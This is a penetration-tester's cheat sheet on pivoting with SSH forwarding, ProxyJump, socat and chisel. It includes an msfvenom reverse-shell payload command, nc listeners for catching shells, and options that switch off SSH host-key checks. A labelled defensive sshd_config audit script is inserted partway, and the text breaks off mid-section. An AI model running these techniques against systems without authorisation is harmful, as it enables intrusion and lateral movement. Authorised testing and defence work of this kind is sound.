Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Not much here yet...please feel free to contribute at my GitHub page.
SSH Tunneling 101
```bash
# SSH local port forward to reach an_internal_server_ip:port via server_ip
ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80
# Now curl localhost:1234 will fetch an_internal_server_ip:80, which is reachable from server_ip only

# dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip
ssh tunneler@server_ip -p 2222 -D 1080
# next configure proxychains with "socks4a localhost 1080", then: proxychains curl http://any_internal_server_ip/
# (any_internal_server_ip is reachable from server_ip only)

# ProxyJump ssh to an_internal_host via server_ip, which is the only host that can reach it
ssh -J tunneler@server_ip:2222 whistler@an_internal_host

# SSH remote port forward to send traffic back to our local port from a port of server_ip
# (-R: the listener is opened on server_ip, not on our side)
ssh whistler@server_ip -p 2222 -R 58671:localhost:1234
# this will listen on port 58671 of server_ip and tunnel the traffic back to us on localhost:1234;
# nc -nlvp 1234 to receive, for example

# Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box, which is only accessible via 1st_box
ssh -J firstuser@1st_box:2222 seconduser@2nd_box -D 1080
# next configure proxychains with "socks4a localhost 1080", then: proxychains curl http://any_internal_server_ip/
# (any_internal_server_ip is reachable from 2nd_box only)

# bypass the first-time host key prompt when you only have a non-interactive shell
# (prepend these options to any of the ssh commands above)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"
```
```bash
# Flags for the SSH session opened from the remote target (10.1.1.230) to Kali (10.1.1.1):
-R 8081:172.24.0.2:80
# (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
# <KALI 10.1.1.1>:8081 <------------ <REMOTE 172.24.0.2>:80
# Now you can access 172.24.0.2:80, which you didn't have direct access to

-L 8083:127.0.0.1:8084
# (on the remote machine listen on 8083, send it to my Kali machine on 8084)
# <KALI 127.0.0.1>:8084 <------------ <REMOTE 10.1.1.230>:8083 <------------ <REMOTE X.X.X.X>:XXXX
# run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
```

For the reverse shell:

```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
```

Run it on the 2nd remote target to get a shell on Kali.
If you didn't have an SSH session
First, SSH to your Kali from target machine
On Kali:
```bash
service ssh start
# "add a user, give it /bin/false in /etc/passwd"
# then, from the target (-N requests no shell, so the /bin/false login shell is never run and the tunnel stays up):
ssh -N -R 12345:192.168.122.228:5986 test@10.1.1.1
```
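As an added example (not part of these notes), a small audit that reads an sshd_config and reports which of the tunnel types above (-L/-D, -J, -R) the server side still permits: the check a defender runs on a host that is not supposed to be a pivot. The directive names and values are the real OpenSSH ones; the sample config is constructed.

```python
from typing import Dict, List
# OpenSSH defaults that apply when a directive is absent from sshd_config.
DEFAULTS = {"allowtcpforwarding": "yes", "disableforwarding": "no",  # yes|no|local|remote|all
            "gatewayports": "no", "permitopen": "any", "permitlisten": "any"}

# Constructed sample: a server that only allows reverse (-R) tunnels, and only on port 1234.
SAMPLE_CONFIG = """
Port 2222
AllowTcpForwarding remote
PermitListen 1234
AllowTcpForwarding yes   # ignored: sshd keeps the FIRST value given for a keyword
Match User tunneler
    AllowTcpForwarding yes
"""

def parse_sshd_config(text: str) -> Dict[str, str]:
    """Effective top-level directives. OpenSSH uses the first occurrence of each
    keyword; conditional 'Match' blocks are not evaluated here (out of scope)."""
    effective = dict(DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)  # drop comments, split key/value
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if key == "match":
            break
        if key in DEFAULTS and key not in seen:
            effective[key] = value
            seen.add(key)
    return effective

def audit_forwarding(text: str) -> Dict[str, object]:
    """Map the sshd settings to the tunnel types from the notes above."""
    cfg = parse_sshd_config(text)
    off = cfg["disableforwarding"] == "yes"
    tcp = cfg["allowtcpforwarding"]
    local_ok = not off and tcp in ("yes", "all", "local")    # -L, -D and -J (direct-tcpip)
    remote_ok = not off and tcp in ("yes", "all", "remote")  # -R (tcpip-forward)
    findings: List[str] = []
    if local_ok and cfg["permitopen"] == "any":
        findings.append("-L/-D/-J allowed to any destination: set PermitOpen")
    if remote_ok and cfg["permitlisten"] == "any":
        findings.append("-R allowed on any port: set PermitListen")
    if remote_ok and cfg["gatewayports"] in ("yes", "clientspecified"):
        findings.append("-R listeners may bind non-loopback addresses: GatewayPorts")
    return {"local": local_ok, "remote": remote_ok, "findings": findings}

if __name__ == "__main__":
    print(audit_forwarding(SAMPLE_CONFIG))
```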
Port Forwarding (Single port to one port)
Using Socat
For Linux
Forward your 8083 to 10.39.0.2:443
```bash
./socat TCP4-LISTEN:8083,fork TCP4:10.39.0.2:443
```
Using Chisel
Most platforms
Remote static tunnels "port to port":
```bash
# On Kali ("reverse proxy listener"):
./chisel server -p 8000 --reverse
# General command (run on the client side):
./chisel client $YOUR_IP:$YOUR_CHISEL_SERVER_PORT L/R:[$YOUR_LOCAL_IP]:$TUNNEL_LISTENING_PORT:$TUNNEL_TARGET:$TUNNEL_PORT
```
Remote tunnels "access IP:PORT you couldn't access before":